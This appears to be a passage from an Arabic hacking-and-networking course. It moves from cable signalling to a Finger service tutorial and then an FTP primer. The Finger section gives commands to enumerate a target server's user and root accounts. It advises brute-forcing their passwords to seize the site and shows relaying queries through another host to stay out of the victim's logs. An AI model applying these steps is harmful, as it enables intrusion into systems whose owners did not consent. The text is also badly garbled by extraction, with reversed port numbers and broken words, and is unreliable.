خاصة بالرسال ‪                                                     ..‬‬ ‫الكترونیة‪                                                      ‬‬ ‫ة‬ ‫نقل الشارات‬ ‫‪                        -:‬‬ ‫ھناك طريقتین لنقل الشارات اللكتروية عبر الكابل ‪-‬‬ ‫‪                              Baseband‬‬ ‫‪B‬‬ ‫‪ -1‬طريقة النقل ذات المدى القاعدي‬ ‫‪                              Broadband‬‬ ‫‪B‬‬ ‫‪ -2‬طريقة النقل ذات المدى الواسع‬ ‫‪                              Baseband‬‬ ‫‪B‬‬ ‫‪ -1‬طريقة النقل ذات المدى القاعدي‬ ‫عبر‪  ‬‬ ‫وتنتقل البیانات فیه على ھ یئة نبضات ضوئیة ‪ /‬كھريبة وكلما كانت تنتقل ر‬ ‫الشارة‪                                              ‬‬ ‫ة‬ ‫كابل طويل كلما ضعفت‬ ‫نفسھ ا و في حالو الضطرار الى استخدام كابل طويل يجب وضع ادوات للتقوية‬ ‫ة‬ ‫ل‪                                               ‬‬ ‫‪ Repeaters‬و التي تعید ارسال‬ ‫الشارة الضعیفة بعد استقبالھا ‪                                             ..‬‬ ‫‪                              Broadband‬‬ ‫‪B‬‬ ‫‪ -2‬طريقة النقل ذات المدى الواسع‬ ‫‪                                      71‬‬ ‫القاعدي‪  ‬‬ ‫ي‬ ‫وتنتقل البیانات على موجات ضوئیة وكما ان نظام النقل ذو المدى‬ ‫م‪                                         ‬‬ ‫يستخدم ‪ Repeaters‬نجد ان نظام‬ ‫‪                    . amplifiers‬‬ ‫‪.‬‬ ‫النقل ذو المدى الواسع يستخدم المكبرات‬ ‫‪                                                    -:‬‬ ‫تلخیص الدرس الول ‪-‬‬ ‫· تستخدم الشبكات في تسھیل تبدال البیانات و مشاركة‬ ‫ة‬ ‫الملفات ‪                                                            ..‬‬ ‫‪ . ( LAN ­ WAN ­ MAN‬‬ ‫‪.‬‬ ‫· يوجد ثلث انواع من الشبكات (‬ ‫· توجد فائدتان رئیسیتان للشبكات ‪ :‬مشاركة البیانات وو‪   ‬‬ ‫‪                           . Hardware‬‬ ‫‪.‬‬ ‫المعلومات و مشاركة الجھزة‬ ‫· يوجد ‪ 5‬اشكال لطبولوجیا الشبكات ‪                   .‬‬ ‫ف‪   ‬‬ ‫· يوجد ‪ 3‬انواع للكابلت ( المحورية ‪ -‬المزدوجة ‪ -‬اللیاف‬ ‫الضوئیة ) ‪                                                            ..‬‬ ‫‪ , Baseband‬‬ ‫‪,‬‬ ‫· يوجد طريقتین لنقل الشارات اللكترونیة (‬ ‫‪                                                         ( Broadband‬‬ ‫‪                                   81‬‬ ‫‪                         Finger‬‬ ‫‪F‬‬ ‫خدمة‬ ‫‪                                                        LAMeR‬‬ ‫‪L‬‬ ‫للكاتب‪:‬‬ ‫وبركاته‪                                       ‬‬ ‫ه‬ ‫السلم علیكم ورحمة االله‬ ‫تقبلوا مني ھ ذا الدرس عن بروتوكول خدمة ‪ Finger‬التي تعمل على بورت ‪9‬‬ ‫‪97‬‬ ‫الدرس‪                                                   ‬‬ ‫س‬ ‫بسم االله نبدأ‬ ‫الدرس‪                                                ‬‬ ‫س‬ ‫فھرس محتويات‬ ‫<================>‪                                       ‬‬ ‫تبرئة‪                                                              ‬‬ ‫‪ 1.1‬ة‬ ‫‪                                                  Finger‬‬ ‫‪F‬‬ ‫‪2.1‬مقدمة عن‬ ‫ن‬ ‫‪                                                    Finger‬‬ ‫‪F‬‬ ‫م‬ ‫استخدام‬ ‫‪3.1‬‬ ‫‪                              Finger‬‬ ‫‪F‬‬ ‫‪4.1‬بعض الخدع عند استخدام خدمة‬ ‫ة‬


‫‪5.1‬الستعلم عن طريق موقع بأستخدام ‪                         Finger‬‬ ‫‪6.1‬الستنتاج من ھذا الدرس‪                                           ‬‬ ‫‪7.1‬الختام‪                                                             ‬‬ ‫‪1.1‬تبرئة‪                                                             :‬‬ ‫<=========>‪                                                    ‬‬ ‫ھذا الدرس فقط للتعلیم ولیس للقیام بأعمال غیر شرعیة‪                 ‬‬ ‫فالكاتب ل يتحمل اي مسؤولیة للستخدام السيء لھذا الدرس‪           .‬‬ ‫‪2.1‬مقدمة عن ‪                                                  Finger‬‬ ‫<===================>‪                                    ‬‬ ‫إ ّ ‪ Finger‬ديمون خدمة تعمل عن طريق البورت ‪ 97‬عادة وكانت ن‪            ‬‬ ‫مستخدمة أصل كنوع ‪ businesscard‬رقمي للناس‪                       .‬‬ ‫المستخدم البعید ( ‪(remote user‬يمكن أن يرسل طلب إلى ‪ Finger‬ديمون‪  ‬‬ ‫يجري على نظام معین‪                                                ‬‬ ‫بورت ‪ Finger‬نوعیة(‪ )97‬وسیحصل على إجابة‪                           .‬‬ ‫‪                                 91‬‬ ‫ھ ذه الجابة ستخبرك من ھم المستخدمین على ھذا النظام و أيضا‪          ‬‬ ‫بعض المعلومات عن ھ ؤلء المستخدمین المتصلین بالنظام‪                   .‬‬ ‫إضافة إلى ھ ذه المعلومات ‪,‬في أغلب الحیان الجابة تخبرك أيضا من الذي‪    ‬‬ ‫يدير النظام (‪(admin‬وكیف قام بالتصال‪                                      .‬‬ ‫قديما استخدم الناس التصال على جمیع انواع النظمة في العالم وطلب‪     ‬‬ ‫الستعلم عن ھ ذه النظمة و الـ ‪ Finger‬كان يعطیھم معلومات عن‪           ‬‬ ‫من ھم الموجودون في النظام وھل لھم حسابات في ھذا النظام‪.‬وكان ‪Finger‬‬ ‫يستخدم قديما في‪                                                          ‬‬ ‫الجامعات و الشركات الكبیرة أيضا‪                                           .‬‬ ‫في الماضي ‪ ،‬الـ ‪ Finger‬إستعمل عامة عن طريق الطلب في الجامعات‪     ‬‬ ‫اذا ارادوا معلومات تخص طلب اخرين في نفس الجامعه‪                      ‬‬ ‫وكثیرا ما تكون الجابة (اجابة ( ‪ Finger Deamon‬بجملة " ! ‪ " Finger me‬اي‪   ‬‬ ‫"أعلمني" !‪                                                                ‬‬ ‫أما الن ومع وجود شبكة النترنت العالمیة اصبح ‪                       Finger‬‬ ‫أقل شھ رة ‪ ،‬لنه توجد الن‪                                                  ‬‬ ‫مواقع الويب للعمل كبطاقة عمل (‪(bisinesscard‬رقمیة خاصة بمستخدمین‪   ‬‬ ‫النترنت وبسبب ملحظة الناس‪                                             ‬‬ ‫التھ ديد الواسع للمن اللكتروني ق ّ استخدام خدمة ‪        Finger Deamon‬‬ ‫ل‪                                         ‬‬ ‫على أية حال‪                                                              ،‬‬ ‫لیس كل النظمة منعت ھ ذه الخدمة وستجد بعض المواقع ) النظمة) تقدم‪   ‬‬ ‫ھذه الخدمة ‪                                                              .‬‬ ‫وھذه اليام يقوم الھ كرز بمحاولت اختراق النظمة بأستخدام برامج‪           ‬‬ ‫‪portscans‬للبحث عن البورتات المفتوحة‪ . . .‬بدون أ ّ أساس علمي‪        .‬‬ ‫ي‪                         ‬‬ ‫لذلك إ ّ ‪ Finger‬ديمون‪ ،‬مثال عظیم لخدمة‪                                  ‬‬ ‫ن‪                                                                    ‬‬ ‫يمكن استخدامھ ا قانونیا لتزودك بكمیة ضخمة من المعلومات الح ّاسة‪      ‬‬ ‫س‪           ‬‬ ‫حول ھدف‪                                                                 .‬‬ ‫لھ ذا سوف أحاول ان اشرح في ھذا الدرس بلغة مفھومة‪                     ‬‬ ‫ما ھو ‪ Finger‬ديمون وماذا يفعل وكیف يمكن استخدامه في مصلحتك‪        ‬‬ ‫الخلصة المقدمة‪ :‬ان خدمة ‪ Finger‬كانت قديما ولزالت تستخدم لجلب‪      ‬‬ ‫المعلومات عن‪                                                              ‬‬ ‫‪                                     02‬‬


‫المستخدمین الموجودين في النظام و ھل لديھم حسابات في ھذا النظام ام‪  ‬‬ ‫ل‪                                                                             .‬‬ ‫ملحظة ‪ :‬النظام ( ‪( server‬ھو جھ از كمبیوتر تخزن فیه معلومات ھائلة‪         ‬‬ ‫ويستخدم في استضافة المواقع‪                                                ‬‬ ‫‪3.1‬استخدام ‪                                                           Finger‬‬ ‫<=================>‪                                             ‬‬ ‫عند استخدام اي من برامج السكان المعروفة مثل ( ‪ (superscan‬للبحث‪       ‬‬ ‫في موقع معین (مثل ( ‪ http://www.foobar.com‬ووجدت به منفذ ‪ (Port‬بورت)‬ ‫‪ 97‬مفتوحا‪                                                                    ‬‬ ‫ھذا يعني ان ‪                                        http://www.foobar.com‬‬ ‫له ‪ Finger‬ديمون يعمل‪                                                        .‬‬ ‫الن كیف نقوم بـ (‪(request‬طلب استعلم؟‪                                    ‬‬ ‫عن طريق وندوز‪                                                               ‬‬ ‫في أغلب الحیان وندوز ل يوجدبه زبون (‪ (client‬خاص للـ ‪ Finger‬مركب )‪      ‬‬ ‫‪                                                                   ) installed‬‬ ‫لذلك سوف نستخدم ‪ Telnet‬كخادم لـ ‪                                 Finger‬‬ ‫‪-‬توضیح‪                                                                     --‬‬‫‪        Telnet(client) ­­­­­­­­request­­­­­­­> Finger Deamon(in Server) o‬‬ ‫عن طريق كتابة السطر التي في موجة الدوس‪                  (MS DOS ( :‬‬ ‫‪                                                  97 telnet www.foobar.com‬‬ ‫بعد ذلك سیظھر لك برنامج ‪ telnet‬و منه تطبع الوامر ‪                        .‬‬ ‫اما من يونیكس‪                                                               ‬‬ ‫لسنا بحاجة إلى أن نستعمل تیلنت لنه يوجد بنظام لینوكس‪                  ‬‬ ‫زبون(‪(client‬خاص بخدمة ‪                                    Finger Deamon‬‬ ‫مر ّب على النظام بشكل دائم تقريبا‪.‬ك‪                                         ‬‬ ‫‪                                      12‬‬ ‫|==========================================‬ ‫===========|‪                                                      ‬‬ ‫|ملحظة ‪ :::‬سیكون الشرح التالي حتى نھاية الدرس لمستخدمي لینوكس‪  ‬‬ ‫أما أذا قررت الستمرار بأستخدام|‪                                         ‬‬ ‫|وندوز ستكون كتابة الوامر في موجه الدوس ثم في التلنت وستكون كتابة‪   ‬‬ ‫الوامر نفسھا الوامر التي|‪                                                ‬‬ ‫|تنكتب بأستخدام نظام لینوكس ولكن بدل "@" نضع" مسافة ثم "‪ www‬في‪  ‬‬ ‫الوندوز مراعیا اسم الموقع|‪                                                ‬‬ ‫|مثل يكون كتابة الوامر في لینوكس ھكذا| ‪                               :‬‬ ‫‪                                                | |finger@anyname.com‬‬ ‫|ولكن في وندوز سیكون ھكذا| ‪                                          :‬‬ ‫‪                                           | |finger www.anyname.com‬‬ ‫|لحظ المسافة بین ‪ finger‬و| ‪                                       www‬‬ ‫|==========================================‬ ‫===========================================‬ ‫=======|‪                                                             ‬‬ ‫اطبع في محث الوامر في يونكس على افتراض انك تستخدم‪ unix shell ) L‬‬ ‫‪                                                     finger@foobar.com‬‬ ‫لحظ ان الھ دف (الموقع المرادمنه معرفة من ھم مستخدمینه ) ھنا ھو‪       ‬‬ ‫‪www.foobar.com‬كمثال‪                                                 ‬‬ ‫فستظھرالنتائج‪                                                          :‬‬ ‫‪                                 :Login: Name: Tty: Idle: When: Where‬‬ ‫‪           root foobar sys console 17d Tue 10:13 node0ls3.foobar.com‬‬ ‫‪                              >.......< >.......< >.......< Amos Amanda‬‬


‫‪                                                      Anderson Kenneth‬‬ ‫‪                                                            Bright Adrian‬‬ ‫‪                                                                Doe John‬‬ ‫‪                              >.......< >.......< >.......< Johnson Peter‬‬ ‫‪                                                            Mitnick Kevin‬‬ ‫‪                                    22‬‬ ‫‪                                                            Munson Greg‬‬ ‫‪                                                            Orwell Dennis‬‬ ‫النتائج؟‪                                               ‬‬ ‫؟‬ ‫الن ماذا تعني ھذه‬ ‫‪      (Name‬‬ ‫(‬ ‫في العمود الول( ‪ ( login‬نرى أسماء المستعملین وفي الثاني (‬ ‫الحقیقیة"‪                                                       ،‬‬ ‫‪،‬‬ ‫"السماء‬ ‫حقیقة‪                 .‬‬ ‫‪.‬‬ ‫التي بالطبع لیست حقیقیة‪ ،‬لكن في معظم الوقت‬ ‫‪                  the terminal type‬‬ ‫‪t‬‬ ‫يرينا العمود الثالث(‪ (Tty‬النوع الطرفي‬ ‫‪                                   the idle time‬‬ ‫‪t‬‬ ‫والرابع (‪ (Idle‬فترة التوقف‪.‬‬ ‫والسادس‪                                ‬‬ ‫س‬ ‫وبعد ذلك في العمودين الخامس‬ ‫بالنظام‪                .‬‬ ‫‪.‬‬ ‫الوقت والمكان الذي استخدم فیه الحساب للتصال‬ ‫أحیانا توجد أعمدة بعنواوين اليمیلت وأرقام ھ واتف‪ ..‬الخ الخاصة بمستخدمین‬ ‫ن‬ ‫النظام‪                                                               ‬‬ ‫م‬ ‫ھذا‬ ‫بیتر‪ ‬‬ ‫إذا كنت تريد المزيد من المعلومات عن مستخدم مّعن ‪ (Johnson Peter‬ر‬ ‫ی‪                        ‬‬ ‫ی‬ ‫جونسن‪                                                                   ‬‬ ‫ن‬ ‫التالي‪                                    :‬‬ ‫‪:‬‬ ‫على سبیل المثال) أدخل المر‬ ‫‪                                            finger johnson@foobar.com‬‬ ‫‪                               Finger‬‬ ‫‪F‬‬ ‫‪4.1‬بعض الخدع عند استخدام خدمة‬ ‫ة‬ ‫<====================================‪        > ‬‬ ‫مى الن شاھدت ما الضعف الرئیسي لخدمة‪                     Finger.‬‬ ‫ن‬ ‫ن‪    ‬أت ّ‬ ‫‪Finger deamon‬يريك ماھي الحسابات الموجوده على النظام‪             ..‬‬ ‫ة‪   ‬‬ ‫ھذا يعني أنك تكسب (عن طريق قانوني ) ‪ % 05‬من المجموعة السحرية‬ ‫ي‪                                                                     ‬‬ ‫وھي‬ ‫الدخول‪          ‬‬ ‫ل‬ ‫كلمات السر‪/‬مجموعة أسماء المستخدمین التي ستمنحك‬ ‫(‪(Access‬إلى نظام ‪                                                       .‬‬ ‫‪                                  32‬‬ ‫برنامج‪  ‬‬ ‫ج‬ ‫إذا عرفت أسماء المستخدمین‪ ،‬ستكون الخطوة القادمة متوقفه على‬ ‫أو‪                                                            ‬‬ ‫‪ bruteforce‬و‬ ‫‪             worldist password cracker‬‬ ‫‪w‬‬ ‫بمعنى آخر برامج تخمین الباسوورد‬ ‫المثال‪                      ‬‬ ‫ل‬ ‫ھناك سكربتات خا ّة كتبت للتیلنت على سبیل‬ ‫ص‪                                                      ‬‬ ‫ص‬ ‫ن‪             ‬‬ ‫اذھب لموقع ‪ http://www.thehackerschoice.com /‬أو ابحث عن‬ ‫‪                                                       VLAD's pwscan.pl‬‬ ‫او‪       ‬‬ ‫لذلك يجب علیك ان تكون قائمة بكلمات السر في ملف نصي (‪  (word‬و‬ ‫المفكره‪                                                                  ‬‬ ‫ه‬ ‫تعمل‪      ‬‬ ‫ل‬ ‫وحاول ان تكون كلمات السرقريبة من أسماء المستخدمین وإذا لم‬ ‫القائمة‪                                                                   ‬‬ ‫ة‬ ‫استخدم برنامج‪ bruteforce -‬أنصحك بھ ذا الوقت ان تحظر لك كأس شاھي‪   ‬‬ ‫استراحة‪                                                        ‬‬ ‫ة‬ ‫وتأخذ لك‬ ‫عمله‪                                               -‬‬ ‫‬‫وتجعل البرنامج يعمل‬ ‫من‪   ‬‬ ‫بالطبع نجد بعض الحسابات للمستخدمین للنظام اكثر اھمیة من غیرھا ن‬ ‫الحسابات‪                                                               .‬‬ ‫‪.‬‬ ‫ف‪         ‬‬ ‫وخاصة حساب الدارة (‪ (Admin‬أو الجذر (‪(root‬بسبب انه عندما تعرف‬ ‫م‪                                                     ‬‬ ‫الباسوورد الخاص بھم‬


‫وقتھ ا تستطیع التحكم بالموقع ‪ .‬وبالطبع بعض الحسابات سھ لة تخمین كلمة‪ ‬‬ ‫السر‪                                                                    .‬‬ ‫ھناك بعض الخدع لمعرفة ھذا النوع من الحسابات‪ .‬على سبیل المثال‪        ‬‬ ‫إطبع المر‪                                                               :‬‬ ‫‪                                              finger secret@foobar.com‬‬ ‫عندما ترسل ھذا المر الي ‪ Finger Deamon‬سیعطیك جمیع الحسابات‪      ‬‬ ‫التي تحتوي على كلمة "‪ "secret‬أ ّا في اسم المستعمل أو السم الحقیقي‪.‬‬ ‫م‪                                       ‬‬ ‫اذا‪ ،‬ماھو الشي المھم في ھ ذا؟ حسنا أنت يمكنك أن تستعمل "‪ "test‬أو‪    ‬‬ ‫"‪"temp‬أو "‪                                                        "0000‬‬ ‫بدل من "‪  "secret‬وكما تعرف من المحتمل ان يكون ھذاالنوع من الحسابات‪   ‬‬ ‫سھ ل معرفة باسوورداته في أغلب الحیان‪                                 .‬‬ ‫‪                                                   finger .@foobar.com‬‬ ‫‪                                   42‬‬ ‫‪                                                       finger 0@foobar.com‬‬ ‫جرب ھذه الوامر وشاھد ما يحدث!‪                                            ‬‬ ‫حاول التعرف على ‪ ، Finger Deamon‬أقرأ ‪RFC‬وأوجد خدعك بنفسك!‪          ‬‬ ‫‪5.1‬الستعلم عن طريق موقع بأستخدام ‪                                Finger‬‬ ‫<======================================‪    > ‬‬ ‫إذا أردت ان استخدم خدمة) ‪ Finger‬معنى ‪ Finger‬كفعل "ألمس" ولكنھا تأتي‪ ‬‬ ‫ھنا بمعنى" استعلم("‪                                                        ‬‬ ‫والستعلم عن موقع معین مثل ھذا"‪                       "www.victim.com‬‬ ‫وأيضا تعرف أن موقع آخر " ‪ "www.host.com‬يقدم خدمة ‪ Finger‬تعمل‪        ،‬‬ ‫عندھ ا يمكنني ان أقدم طلبا مثل ھ ذا‪(:‬اكتب في محث الوامر مثل ھذا(‪      ‬‬ ‫‪                                              finger@host.com@victim.com‬‬ ‫‪Host.com‬يستعلم ( ‪ (Finger‬الن ‪ victim.com‬ويريك النتائج ‪                  .‬‬ ‫أحدالفوائد من ھذه الطريقة انك ستكون مجھول لدى‪              victim.com‬‬ ‫فعندما تقوم‪                                                  www.victim.com‬‬ ‫بطلب سجل (الدخول (‪log‬ستشاھد ‪ www.host.com‬في سجلتھم‪ ،‬بدل منك‬ ‫‪                                                                           .‬‬ ‫فائدة اخرى وھ ي أنك يمكن ان تترك) ‪ Host‬موقع) يقوم ( عن طريق خدمة‪    ‬‬ ‫( ‪Finger‬بالستعلم عن حاسوبا‪                                                ‬‬ ‫آخرا على نفس الشبكة ‪ ،‬بینما اذا طلبت انت ھ ذا الستعلم بأستخدام خدمة‬ ‫‪Finger‬من جھازك‪                                                            ‬‬ ‫لن تكون مسموحة لك لنك سأكون غیر موثوق به لدى المستعلم عنه‪        ‬‬ ‫بعكس اذا كان الطلب للستعلم باستخدام ‪ Finger‬عن طريق موقع‪          .‬‬ ‫يعني الخلصة ‪ :‬ان الموقع الذي تريد الستعلم عنه يعتبر حاسوبك الشخصي‬ ‫غیر موثوق به بعكس‪                                                          ‬‬ ‫اذا كان الستعلم عن طريق موقع اخر يشابھه فسوف يسمح له ‪           !.‬‬ ‫‪                                        52‬‬ ‫‪6.1‬الستنتاج من ھذا الدرس‪                                         ‬‬ ‫<=======================>‪                         ‬‬ ‫‪ Finger Deamon‬يمكن أن يكون مصدر معلومات ضخم لي واحد يحاول‪   ‬‬ ‫كسب الدخول ( ‪( access‬إلى نظام‪                                   .‬‬ ‫‪ Finger deamon‬قانونیا يز ّدك بنصف كلمات السر واسماء المستخدمین‪  ‬‬ ‫و‪                                           ‬‬ ‫التي تحتاجھا لكسب الدخول‪                                  access.‬‬ ‫ھ ناك بضعة خدع لطیفة تمكنك من معرفة حسابات خاصة تبحث عنھا‪     ‬‬ ‫من معرفتك لھ ذه الحسابات تستطیع كسر الباسووردات ‪ ،‬بإستعمال تقنیة‬ ‫‪wordlist‬أو‪                                              bruteforce.‬‬


‫ل ‪   Finger deamon‬‬ ‫ك‪  ‬تذ ّر فوائد "الستعلم عن طريق موقع"أيضا بأستعمال‬ ‫ك‬ ‫الختام‪                                                          ‬‬ ‫م‬ ‫‪7.1‬‬ ‫<=========>‪                                                 ‬‬ ‫الدرس‪                                  ‬‬ ‫س‬ ‫اتمنى الستفادة لمن قرأ ھذا‬ ‫الشرح‪                              ‬‬ ‫ح‬ ‫وانشاالله ما أكون طولت علیكم في‬ ‫مسلم‪                                         ‬‬ ‫م‬ ‫وترا حقوق النشر لكل‬ ‫‪                               62‬‬ ‫‪                                FTP‬‬ ‫‪F‬‬ ‫ماھو‬ ‫‪                                                        KING_ABDO‬‬ ‫‪K‬‬ ‫للكاتب‪:‬‬ ‫؟‪                                               ‬‬ ‫ما ھو بروتوكول نقل الملفات ؟‬ ‫­=­=­=­=­=­=­=­=­=­=­=­=­=­=‪                                       ‬‬ ‫‪                                                 ftp= file transfer protocol‬‬ ‫بروتوكول نقل الملفات ھ و عباره عن مجموعة من من القواعد التي تملي كیفیة‬ ‫ة‬ ‫‪                                         tcp/ip‬‬ ‫‪t‬‬ ‫نقل الملفات على بروتوكولت‬ ‫يتكون التصال من مزود و زبون حیث يقوم الزبون بالحصول على ملف عن طريق‬ ‫ق‬ ‫‪      12‬‬ ‫فتح اتصال مع المزود ‪ ،‬و غالبا يعمل المزود ھنا عن طريق المنفذ رقم ‪1‬‬ ‫ملحظة!‪                                                                    ‬‬ ‫!‬ ‫­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=‪  ‬‬ ‫­=‪                                                                         ‬‬ ‫ر‪               ‬‬ ‫يمكن أن يغیر مدير النظام رقم المنفذ من ‪ 12‬إلى أي منفذ آخر‬ ‫­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=‪  ‬‬ ‫­=‪                                                                         ‬‬ ‫عبارة‪            ‬‬ ‫ة‬ ‫و عندما يتم التصال بین المزود و الزبون يقوم المزود بإرسال‬ ‫الشكل‪                               ‬‬ ‫ل‬ ‫‪:‬ترحیبیة للزبون و غالبا تكون بمثل ھذا‬ ‫‪                              022 ! SpiderMan's FTP server. Please login‬‬ ‫‪ completion code‬كما لحظت يوجد ھناك رقم في بداية العبارة و ھو ماا‪      ‬‬ ‫يسمى‪                                                                     ‬‬ ‫ى‬ ‫الكمالي‪                                                               ‬‬ ‫ي‬ ‫الرمز‬ ‫ما‪             ‬‬ ‫و في العبارة الترحیبیة يكون الرمز الكمالي واحد من اثنین و ھ ا‬ ‫‪                                                   022‬‬ ‫‪0‬‬ ‫إذا قبل المزود التصال‬ ‫‪                                                  124‬‬ ‫إذا رفض المزود التصال ‪1‬‬ ‫طلب‪         ‬‬ ‫بعد أن يقوم المزود بإرسال العبارة الترحیبیة يقوم الزبون بإرسال ب‬ ‫‪                                    72‬‬ ‫الكلمات‪         ‬‬ ‫ت‬ ‫إلى المزود ‪ ،‬و يكون ھذا الطلب عبارة عن كلمة معینه و بعض‬ ‫يكثر‪      ‬‬ ‫تحتاج إلى إضافة قیمة لھا و ھذا الجدول يحتوي على الكلمات التي ر‬ ‫استخدامھاا‪                                                                ‬‬ ‫الوظیفة‪                                                             ‬‬ ‫ة‬ ‫الطلب‬ ‫م‪                                        ‬‬ ‫‪ CWD‬تغییر المجلد الحالى في الملقم‬ ‫ة‪                       ‬‬ ‫‪ PWD‬كتابة الموجود في المجلد الحالي على الشاشة‬ ‫ه‪                   ‬‬ ‫‪  CDUP‬للخروج من المجلد الحالى إلى المجلد الذي يحتويه‬ ‫م‪                                              ‬‬ ‫‪ MKD‬لنشاء مجلد على الملقم‬ ‫م‪                                           ‬‬ ‫‪ RMD‬لزالة مجلد من على الملقم‬ ‫م‪                                           ‬‬ ‫‪ DELE‬لزالة ملف من على الملقم‬ ‫ل‪                           ‬‬ ‫‪ USER‬لرسال اسم المستخدم في عملیة الدخول‬ ‫ل‪                                ‬‬ ‫‪ PASS‬لرسال كلمة السر في عملیة الدخول‬ ‫ل‪                                                     ‬‬ ‫‪ ABOR‬للتوقف عن النقل‬ ‫ل‪                                                        ‬‬ ‫‪ QUIT‬لغلق لتصال‬ ‫م‪                                     ‬‬ ‫‪ STAT‬للحصول على الحالة على الملقم‬ ‫م‪                                 ‬‬ ‫‪ RETR‬لطلب الحصول على ملف من الملقم‬ ‫م‪                             ‬‬ ‫‪ STOR‬لرسال ملف من جھاز الزبون إلى الملقم‬


‫‪ SYST‬للحصول على معلومات عن نظام التشغیل على الملقم‪                ‬‬ ‫‪ HELP‬للحصول على مساعدة عن أحد الطلبات‪                              ‬‬ ‫بعد إرسال الطلب يجب على الزبون أن ينتظر حتي يتلقى الرد من المزود قبل‪  ‬‬ ‫أن يقوم بإرسال طلب آخر‪                                                    ‬‬ ‫إل إذا قام بإرسال طلب إغلق للتصال فلن يكون علیه النتظار حتى يتلقى الرد‬ ‫من المزود بالنسبة للمر السابق‪                                            ‬‬ ‫بعد أن يتم التصال و يقوم المزود بإرسال العبارة الترحیبیة يجب على الزبون أن‪ ‬‬ ‫يقوم بإرسال إسم‪                                                           ‬‬ ‫المستخدم و كلمة السر لیقوم بالدخول إلى ملقم الخدمة‪                    ‬‬ ‫بعد أن يقوم الزبون بإرسال طلبة يقوم المزود بإرسال الرد علیه و ھو يتكون من‪ ‬‬ ‫رمز إكمالي متبوعا بسطر أو أكثر‪                                            ‬‬ ‫‪                                     82‬‬ ‫و عموما فعندما يكون الرقم الثاني من الرمز الكمال ھو ‪ 0‬فیكون ھناك خطأ‬ ‫كتابي في الطلب الذي أرسله الزبون‪                                    ‬‬ ‫و عندما يكون الرقم الثاني ‪ 2‬فعندھا تكون إما عبارة ترحیب أو توديع ‪     .‬‬ ‫‪                                 92‬‬ ‫ماھو نقل الملفات ‪                        ?FTP‬‬ ‫‪ FTP‬ھي اختصار لكلمة ‪ File Transfer Protocol‬وتعني بروتوكول نقل الملفات‪،‬‬ ‫وھذه الخدمة ھي احدى تسھیلت ‪ TCP/IP‬التي تجعل من الممكن نقل‪      ‬‬ ‫الملفات بین الكمبیوترات على الشبكة ومن میزات ‪ FTP‬الرائعة أنھا تقوم‪      ‬‬ ‫بترجمة شكل الملفات النصیة بطريقة أتوماتیكیة حیث أن الكمبیوترات تحتوي‪  ‬‬ ‫نظم تشغیل مختلفة وعلیه فلديھا أشكال ‪ Formats‬مختلفة للملفات النصیة‪  ‬‬ ‫فبالتالي تحتاج لترجمة وھو ماتقوم به ‪ ,FTP‬وبخدمة نقل الملفات فاننا نحتاج‪  ‬‬ ‫ف في أمیركا الى جھازنا‪                 .‬‬ ‫لبضع نقرات على الفأرة كي ننقل مل ً‬ ‫ا‪                                        ‬‬ ‫أقسام نقل الملفات‪                                                        :‬‬ ‫نقل الملفات ينقسم الى قسمین‪                                            :‬‬ ‫•‪   ‬تنزيل الملفات ‪                                              :Download‬‬ ‫وھو جلب الملفات من الكمبیوتر المضیف ‪ Host‬الى الجھاز المحلي ‪    .Local‬‬ ‫•‪   ‬ارسال الملفات ‪                                                :Uplaod‬‬ ‫وھو ارسال الملفات من الكمبیوتر المحلي ‪ Local‬الى الكمبیوتر المضیف ‪.Host‬‬ ‫ومن الناحیة المنیة فھناك نوعان لنقل الملفات‪                               :‬‬ ‫•‪    ‬نقل مؤمن ‪                                                :FTP Secure‬‬ ‫تحتاج الى اسم مستخدم وكلمة مرور للدخول الى النظام وتحصل علیه من‪   ‬‬ ‫مدير النظام المضیف‪                                                        .‬‬ ‫•‪      ‬نقل مجھول ‪                                          :Anonymous FTP‬‬ ‫ب استخدام‪     ‬‬ ‫لتحتاج الى اسم مستخدم وكلمة مرور للدخول وتستطیع غال ً‬ ‫ا‪               ‬‬ ‫ض عنھما‪                                           .‬‬ ‫‪ guest‬أو ‪ anonymous‬عو ً‬ ‫ا‪                                                  ‬‬ ‫تصنف مصادر البرامج على النترنت الى ثلثة أقسام‪                          :‬‬ ‫‪                                     03‬‬ ‫•‪         ‬ملكیة عامة ‪                                             :Public Domain‬‬ ‫وضعت البرامج ھنا للستخدام العام فلیس ھ ناك حقوق ملكیة لحد ول قیود‪   ‬‬ ‫على استخدامھا وتوزيعھا وتعديلھا‪                                            .‬‬ ‫•‪         ‬مصادر مجانیة ‪                                                :Freeware‬‬ ‫يحق للجمیع استخدام ھذه البرامج أو توزيعھا ولكن ھناك حقوق ملكیة ونشر‪  ‬‬ ‫ول يجوز تعديلھا أو بیعھا‪                                                       .‬‬ ‫•‪           ‬مصادر مشتركة ‪                                             :Shareware‬‬ ‫يتم توزيع ھ ذه البرامج بغرض التجربة قبل الشراء وقد لتتضمن جمیع الممیزات‪ ‬‬


‫ويجب تحطیم النسخ بعد انتھاء مدتھا‪                                         .‬‬ ‫‪ FTP‬والفیروسات‪                                                              :‬‬ ‫يجب أن تعلم في البداية أن الملفات والبرامج تنقسم الى قسمین‪             ‬‬ ‫‪                                                                          :ASCII‬‬ ‫ا‪  ‬اختصاًر لـ( ‪         (American Standard Code for Information Interchange‬‬ ‫والملفات من ھذا النوع تحتوي على سبعة جزيئات ‪ bits‬تتراوح قیمتھا بین‪      ‬‬ ‫الصفر و ‪ .721‬ويستخدم ھذا المصطلح للتعبیر عن المعیار الذي يقوم بتحويل‪   ‬‬ ‫الحرف الى أرقام في الكمبیوتر‪ .‬وتستخدم الملفات النصیة ھذا النوع من‪       ‬‬ ‫الصیغ‪                                                                            .‬‬ ‫‪                                                                         :Binary‬‬ ‫وتعني الملفات ذات النظام الثنائي وتحتوي على ثمانیة جزيئات ‪ bits‬تتراوح بین‬ ‫الصفر و ‪ 552‬وتندرج الصور والبرامج والملفات المضغوطة تحت ھذا النوع‪        .‬‬ ‫والفیروسات ل يمكن أن تنتقل عبر ملفات ‪ ASCII‬كما ليمكن أن تنتقل عبر‪      ‬‬ ‫الصور كصیغ ‪ bmp & gif & jpg‬وغیرھا من امتدادات الصور ول عبر ملفات‪        ‬‬ ‫الفیديو والصوت مثل ‪ mpg ­ mp3 ­ wav ­ avi ­ ram‬وغیرھا‪ ،‬وبمعنى آخر فانھا‬ ‫تنتقل عبر البرامج وملفات النظام والتشغیل والبرامج المضغوطة وعادة ماتكون‪ :‬‬ ‫‪                                      13‬‬ ‫‪ovl ­ zip ­ mim ­ 